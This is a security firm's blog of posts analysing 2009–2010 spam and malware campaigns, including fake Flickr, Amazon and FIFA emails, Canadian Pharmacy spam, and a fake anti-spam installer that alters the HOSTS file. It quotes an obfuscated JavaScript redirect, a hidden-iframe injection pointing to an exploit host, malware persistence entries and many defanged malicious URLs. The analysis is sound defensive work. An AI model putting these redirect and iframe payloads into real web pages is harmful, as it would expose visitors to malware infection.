Spam message inside a ZIP file

August 25, 2010 by mxlab Leave a Comment

Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used.

The spam email had the subject “Your wife photos attached”, a very short body content ” Your wife photos” and the attached file rooster.zip.

At first, we thought this was some new email security treath so we investigated the ZIP archive. Once extracted the file rooster.jpg was available. The filename does not end with .exe or the combination of many spaces with at the end .exe so we opened the JPEG and got this spam advertisment for Viagra, Cialis and VPXL.

The instructions, if you are interested, is to go to med242.ru which leads to the web site of the Canadian Pharmacy.

I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.

Filed under Spam Tagged with ,

Yahoo Groups being abused by spammers

August 6, 2010 by mxlab 1 Comment

Great names are quite often the subject of abuses and this time, the  Yahoo Groups are being used in spam messages. Spammers have created a large amount of account on the Yahoo Groups and are including URLs in their spam messages.

The messages comes with the subject line in the form of: ****@***.be VIAGRA ® Official Site -77%. The body of the email only contains an URL to for example hxxp://groups.yahoo.com/group/*****/message.

This is an example of such a web site.

The image that promotes Viagra also contains an URL that leads to, in our case, hxxp://superdrugsudden.com:8080/. And yes, it’s the Canadian Pharmacy again. We have to admit that they are very active on the internet.

Filed under Spam Tagged with

Flickr welcome message leads to Canadian Pharmacy web site

July 6, 2010 by mxlab Leave a Comment

Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers.

MX Lab started to intercept messages with the subject “[Flickr] Welcome!”, send from a spoofed email address, with an welcome message  from Flickr (see image below).

Every link in the message leads to a different URL, even the links behind Terms of Services or the Privacy Policy.

hxxp://mahimatex.com/sanitation.html
hxxp://electricbrochures.com/custodian.html
hxxp://eventosgs.com.ar/climate.html
hxxp://newcivas.altervista.org/overstatements.html
hxxp://complicat.go.ro/modestly.html
hxxp://kankash-g-s.com/chicagoans.html
hxxp://pliki.open-it.pl/deigned.html
hxxp://turismatica.go.ro/grapefruit.html
hxxp://behsood.ir/schedulable.html
hxxp://jpaquino.com/headlines.html
hxxp://awtchiro.com/consulates.html

The web sites above function as a redirect to hxxp://keptoften.com/

Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.

I personally do not understand why they are doing this because an Intent Analysis filter, that analyses the included URLs in emails, can blacklist many URLs from these web sites immediatly when investigating one single spam message.

When only using the domain for visiting the sites we get quite often a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy hxxp://pharmacymentalhealth.com (see image below).

Filed under Spam Tagged with , , ,

Thumbs up for Bit.ly to block shortened URL in “Coupe du Monde de la FIFA 2010″ spam

June 11, 2010 by mxlab Leave a Comment

Emails with regarding FIFA World Cup are going around the world now and persons who have less good intentions are on the lookout to create some mayhem. A recent example is the email “FIFA World Cup South Africa… bad news” but the traditional spam messages are also going around on the internet.

MX lab intercepted some emails with the subject “Coupe du Monde de la FIFA 2010″ from World Cup <207peugeot@menara.ma> that are obviously spam and here is the body of the email:

bonjour ,

est ce que vous voulez voir les matchs de la coupe gratuitement ?
si oui n’hesiter pas a telecharger ce logiciel :

http://bit.ly/worldcupe

cordialement

=========================================

The message is in the French language but translated it offers you an option to get software to watch the soccer matches of the World Cup for free.

When using the bit.ly URL shortened link we arrive on the FLV web site http://www.flvpro.com/movies/?aff=4749_movies.

While this is all great, a free download of such a tool, getting your message in this format out to the world is not the way to do it. I refer to the use of bit.ly for the URL, no unsubscribe options and no clear indication who has sent this message. Very bad marketing if you ask me.

MX Lab reprted this to bit.ly, which is something we usually do not do but we thought why not, and bit.ly responded within 10 mintes with a reply that the shortened URL is blocked for further use. Thumbs up for such a fast response.

Now, this is completely off topic, but notice the counter ‘Downloaded 2358755 times’ on the web site http://www.flvpro.com/. This is just a Javascript ticker that increases the counter.

<script type="text/javascript">
var num = 2358754;
function IncCounter() {
num = num + 1;   // increment counter by 2
document.getElementById("cntr").innerHTML = num.toLocaleString();
t = setTimeout('IncCounter()', 2000);
// change 1000 to 60000 to update once per minute
}
</script>

When you refresh the page, the counter is back to 2358755.
Very nice marketing! ;-)

Filed under Spam Tagged with , , , ,

“FIFA World Cup South Africa… bad news” emails leads reader to host with malware

June 11, 2010 by mxlab 2 Comments

MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.

The from address is spoofed and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html that contains a malicious javascript:

<script type=’text/javascript’>
function dX(){};
var h=new Date();
dX.prototype = {
f : function() {
var u=function(){};
var uY=new Date();
var o=”";
var k=document;
var oE=function(){};
var l=”;
this.i=33457;
var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, ”)];
var w=function(){};
var p=false;
this.pP=false;
this.s=”;
kV['hGrGe>f>'.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);
var iK=”iK”;
pK=”;
this.d=”d”;
uM=”";
}
};
this.dK=”";
var fG=new dX();
var dR=”dR”;
fG.f();
hJ=false;
</script>

This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.

At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.

This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.

Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:

<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" />

<iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.

Filed under Email security, Spam Tagged with , ,

Explorer SPAM Detector for Public is malware

March 13, 2010 by mxlab 2 Comments

MX Lab intercepted a few messages with the subject “Systematic Security Software : Explorer SPAM Detector for Public” send from the spoofed address Systematic Inc <soft@systematic.com>.

The email offers a software tool called Explorer Spam Detector from Symantec:

Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.

Below is an actual screenshot of the email:

The included URLs wil take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.

The malware is approx. 1,5 MB when downloaded and is named Setup.exe.

Submission to Virus Total gives us the result that only 1 of the 40 AV engines did detect the malware: Symantec AV engine version 20091.2.0.41. The name Suspicious.Insight is a detection for files from the Symantec’s reputation-based security technology so this is not the name of the malware.

When executed on a computer, the system gets infected and a new window is created:

With the appearance of this window on your system you could have the indication that the software didn’t installed correctly. By now, your computer is infected.

Folowing files are created:

%AppData%\Microsoft\System\Services\[filename of the sample #1] where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The file %System%\drivers\etc\hosts is modifed and following folders are created:

* %AppData%\Microsoft\System
* %AppData%\Microsoft\System\Services

A Windows registtry is added so that the malware is run each time the computer boots:

# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* [filename of the sample #1] = “%AppData%\Microsoft\System\Services\[filename of the sample #1]“

The HOSTS file is updated with the following URL-to-IP mappings:

127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 221.207.255.61
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 91.121.223.25
127.0.0.1 www.xxbots.net
127.0.0.1 xxbots.net
127.0.0.1 208.43.26.70
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 66.36.241.92
127.0.0.1 forums.malwarebytes.org
127.0.0.1 74.63.217.106
127.0.0.1 www.codespace.net
127.0.0.1 codespace.net
127.0.0.1 174.133.4.108

As you can see, with this action you will not longer have access to the web sites that are listed here. Due to the HOSTS file change, all request to visit these sites will point you back to your local computer on 127.0.0.1. This is in order to avoid that the user can visit these sites for information or for downloading anti virus/malware software. If you are infected with this malware, make sure that you modify the HOSTS file.

The possible country of origin for this malware is Russia.

Virus Total permlink and MD5: 97ff431ca077c59d76d147832260b7ef.

Filed under Spam, Viruses Tagged with , , ,

Web site creator hosts are being abused in spam campaigns

March 6, 2010 by mxlab Leave a Comment

Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases, the content is published on these site or a redirect is embedded and forwards the visitor to the web site of their choice offering porn, pills and other stuff.

MX Lab noticed an increase the last few days of URLs in spam messages that point to (free) web site creater hosts or less well know blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.

Some examples of the spam:

of necromancer beyond power drill ostensibly wily
dissidents customer
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com
because girls

dissidents blotched greedily

mirror about starlet likeable
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html

haunchestoward

for cleavage inside carelessly womanly
bubble baths scythe
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com
or tea parties

over and accidentally

tea parties flabby
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html

philosopherssecretly

What we also notice is the use of random words in the spam message again. This is a very common technique being used in the past to avoid detected by Bayesian filters and/or to compromise and corrupt the knowledge database of the Bayesian filter when the message is used to train the filter.

This technique is also present in the latest spam campaign of the Canadian Pharmacy:

This is a link to our shop http://bc.greatsilent.ru/

gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy
irewyumuco izaafoe samin uypoi nyqii asydado
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley
yeqa uhybyo nidodyziru logu noboma uuju uedywaby
…. (cut)….

New web site creator hosts are being used each day. When I visited a few of those web site creator host I found out that subscription is so easy to do. You can automate account requests quite easily up to a certain point without being blocked by some way of security measure or by clicking on an activation link by email.

On doodlekit.com we found a CAPTCHA security on the subscription web form but I believe that a good CAPTCHA should have letters that are less readable than this one. But, this is a start.

On webs.com I did set up a dummy web site account with the site address http://tryviagra.webs.com without any security measure! This means that anyone can set up an free web site creator account when completing the webforms.

In this particular case, I can even automate every step and let a bot do all the work for you. I could create from 10 to 100 accounts on a day and perhaps the site administrators wouldn’t even notice this. It is a very efficient way of getting coverage on the internet, getting free hosting for my site or redirect visitors to my site.

To make it worse, I can also place malware on this site and try to infect each visitor on my site with malware, ransomware or other malicious files.

As a spammer, I have the advantage over Intent Anyalisis tools or SURBL, tools that examine and block messages based on the included URLs, by generating mutliple URLs each day and changing URLs in the spam message.

Again, it shows that internet security is a responsability of everyone and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features that spammers have today – this is a nice example I think – can’t be used tomorrow.

Feel free to comment on this post.

Disclaimer: it is not our intention to attack webs.com on their lack of security – perhaps in a certain way it is – but to point out how easy it is to abuse certain online tools.

Filed under Spam Tagged with

Spam campaign from Canadian Pharmacy also contains web based threats

February 15, 2010 by mxlab 1 Comment

MX Lab detected several email based threats in a spam campaign from Canadian Pharmacy masked as an order confirmation of Amazon.

The campaign comes from the spoofed email address Customer Support <***.***@service.amazon.com> and has the possible following subjects (*** numbers will vary):

Confirm #***
Confirmation Order #***
Notice #***
Notify #***
Notification #***
Order Confirmation #***
Order Notice #***
Order Notify #***
Order Notification #***

The body of the email:

Your Order S\n:10444064511 Accepted.
Details hxxp://www.klaudiusz.ramtel.pl/afrikaners.html

Thank you.
Amazon.com Customer Support

The campaign is detected yesterday but today we found a few threaths when following the included URLs. One threat was named HTML:iFrame-LZ[Trj] (Avast).

HTML:iFrame-LZ[Trj] is a malicious HTML script that may be downloaded unknowingly by a user when visiting malicious Web sites. The script will make connection to sites to download file(s). As a result, malicious routines of the downloaded files are exhibited on the affected system.

Filed under Malware, Spam, Viruses Tagged with , , ,

Twitter accounts abused by spammers

November 18, 2009 by mxlab 1 Comment

MX Lab detected a spam campaign where Twitter is being abused by spammers to promote online drug stores.

The campaign is sent from random spoofed email addresses and has similar subjects like:

7U1 An amazing selection of brand name medications, all for incredibly low prices!
2F9 Looking for Hytrin? 7N8
6W3 Looking for Abilify?
5Z2 Looking for Fosamax?
4G5 Do you suffer from male impotence? Order Viagra online today 8I7
5Y5 Do you have a urinary blockage?

Some samples of the body:

hxxp://twitter.com/oscaresquire/status/5804523982

All Medications are Always 100% Safe Legal
Our store is Verified, Trusted Licensed
Guaranteed LowPrices – up to 85% Off

! G6Y3

* P h 3nt_ er mI.ne 37.5
* S0 .m@
* X@ /\/ a .X
* R1 .T@ L in
* C 0 d1n3
* V /\ L 1Um
* KL 0 N_0.p in
* AMB1en
* Ci..@ _Lis
* V| @ g.R @

www.twitter.com/dweepadvani/status/5790731913
This message was sent to 96190

And another one

site that pharmacies and big companies don’t want you to know about!
Vicodin ES Online, Hyrdrocodone, Lortab…

hxxp://twitter.com/itaiba/status/5803131461

They all have the URL in common that points to a Twitter account. The format is  http://twitter.com/***/status/*** where *** stands for random characters.

Some examples of such an Twitter account that directs you to the online pharmacy.

The med4udirect.com shop looks like this:

The domain appears to registered in China.

 DomainName : MEDS4UDIRECT.COM

RSP: China Springboard Inc.
URL: http://www.namerich.cn      

Name Server :NS3.BERTOSNS.COM
Name Server :NS5.LOVELYSNB34.COM
Name Server :NS1.HDNSSTUFF.COM
Name Server :NS6.LOVELYSNB34.COM
Name Server :NS2.HDNSSTUFF.COM
Name Server :NS4.BERTOSNS.COM
Status :clientTransferProhibited
Status :clientDeleteProhibited
Creation  Date :2009-09-26
Expiration Date :2010-09-26
Last Update  Date :2009-11-11

Registrant ID :V-X-63521-21717
Registrant Name :LU TAO
Registrant Organization :LU TAO
Registrant Address :JIEFANGLU251
Registrant City :ShangHai
Registrant Province/State :ShangHai
Registrant Country Code :CN
Registrant Postal Code :200126
Registrant Phone Number :+86.0217415426
Registrant Fax :+86.0217415426
Registrant Email :djsnhe@163.com

Administrative ID :V-X-63521-21717
Administrative Name :LU TAO
Administrative Organization :LU TAO
Administrative Address :JIEFANGLU251
Administrative City :ShangHai
Administrative Province/State :ShangHai
Administrative Country Code :CN
Administrative Postal Code :200126
Administrative Phone Number :+86.0217415426
Administrative Fax :+86.0217415426
Administrative Email :djsnhe@163.com

Billing ID :V-X-63521-21717
Billing Name :LU TAO
Billing Organization :LU TAO
Billing Address :JIEFANGLU251
Billing City :ShangHai
Billing Province/State :ShangHai
Billing Country Code :CN
Billing Postal Code :200126
Billing Phone Number :+86.0217415426
Billing Fax :+86.0217415426
Billing Email :djsnhe@163.com

Technical ID :V-X-63521-21717
Technical Name :LU TAO
Technical Organization :LU TAO
Technical Address :JIEFANGLU251
Technical City :ShangHai
Technical Province/State :ShangHai
Technical Country Code :CN
Technical Postal Code :200126
Technical Phone Number :+86.0217415426
Technical Fax :+86.0217415426
Technical Email :djsnhe@163.com

Filed under Spam Tagged with , , ,

Can a spammer be creative?

October 5, 2009 by mxlab Leave a Comment

Yes, that is the answer we have today. MX Lab detected a nice piece of spam and we didn’t wanted to hold this one back for you.

It’s not image based, no ASCII art but the text is constructed and formatted by the character “#”. It didn’t render well in Entourage on Mac so it needs a little work. ;-)

Filed under Spam Tagged with

Older posts